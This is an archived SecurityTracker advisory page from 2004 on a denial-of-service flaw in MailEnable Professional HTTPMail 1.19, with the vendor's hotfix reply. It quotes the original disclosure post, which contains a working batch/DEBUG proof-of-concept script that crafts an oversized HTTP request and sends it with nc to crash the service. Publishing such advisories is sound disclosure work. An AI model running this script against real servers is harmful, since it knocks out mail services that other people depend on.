SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Server)  >   MailEnable Vendors:   MailEnable Pty. Ltd.
(Vendor Issues Fix) MailEnable Professional HTTPMail Bug Lets Remote Users Deny Service
SecurityTracker Alert ID:  1010899
SecurityTracker URL:  http://securitytracker.com/id/1010899
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 9 2004
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 1.19
Description:   A vulnerability was reported in MailEnable Professional. A remote user can cause denial of service conditions on the HTTPMail service.

CoolICE reported that a remote user can connect to the webmail service on port 8080 and send a specially crafted HTTP GET request to cause denial of service conditions on the target system.

Impact:   A remote user can cause denial of service conditions on the HTTPMail service.
Solution:   The vendor has issued a hotfix, available at:

http://www.mailenable.com/hotfix
http://www.mailenable.com/hotfix/MEHTTPS.zip

Vendor URL:  www.mailenable.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  Windows (NT), Windows (2000), Windows (2003), Windows (XP)

Message History:   This archive entry is a follow-up to the message listed below.
Aug 2 2004 MailEnable Professional HTTPMail Bug Lets Remote Users Deny Service



 Source Message Contents

Subject:  RE: [Full-Disclosure] DOS@MEHTTPS


Thanks,

A hotfix for this bug is available from:

http://www.mailenable.com/hotfix


Peter Fregon
MailEnable Pty. Ltd.


-----Original Message-----
From: full-disclosure-admin@lists.netsys.com
[mailto:full-disclosure-admin@lists.netsys.com] On Behalf Of CoolICE
Sent: Monday, 2 August 2004 5:19 PM
To: suggest
Cc: bugtraq; full-disclosure; list
Subject: [Full-Disclosure] DOS@MEHTTPS

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:Application:	MailEnable Professional HTTPMail 
:Vendors:	http://www.mailenable.com/
:Version:	1.19
:Platforms:	Windows
:Bug:		D.O.S
:Date:		2004-07-30
:Author:	CoolICE
:E_mail:	CoolICE#China.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
@echo off
;if '%1'=='' echo Usage:%0 target [port]&&goto :eof ;set PORT=8080 ;if not
'%2'=='' set PORT=%2 ;for %%n in (nc.exe) do if not exist %%~$PATH:n if not
exist nc.exe echo Need nc.exe&&goto :eof ;DEBUG < %~s0 ;GOTO :run

e 100 "GET / HTTP/1.0" 0D 0A "Content-Length: "
!DOS@length>0x64
f 120 183 39
e 184 "XXXX" 0d 0a 0d 0a
rcx
8c
nhttp.tmp
w
q


:run
nc %1 %PORT% < http.tmp
del http.tmp

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC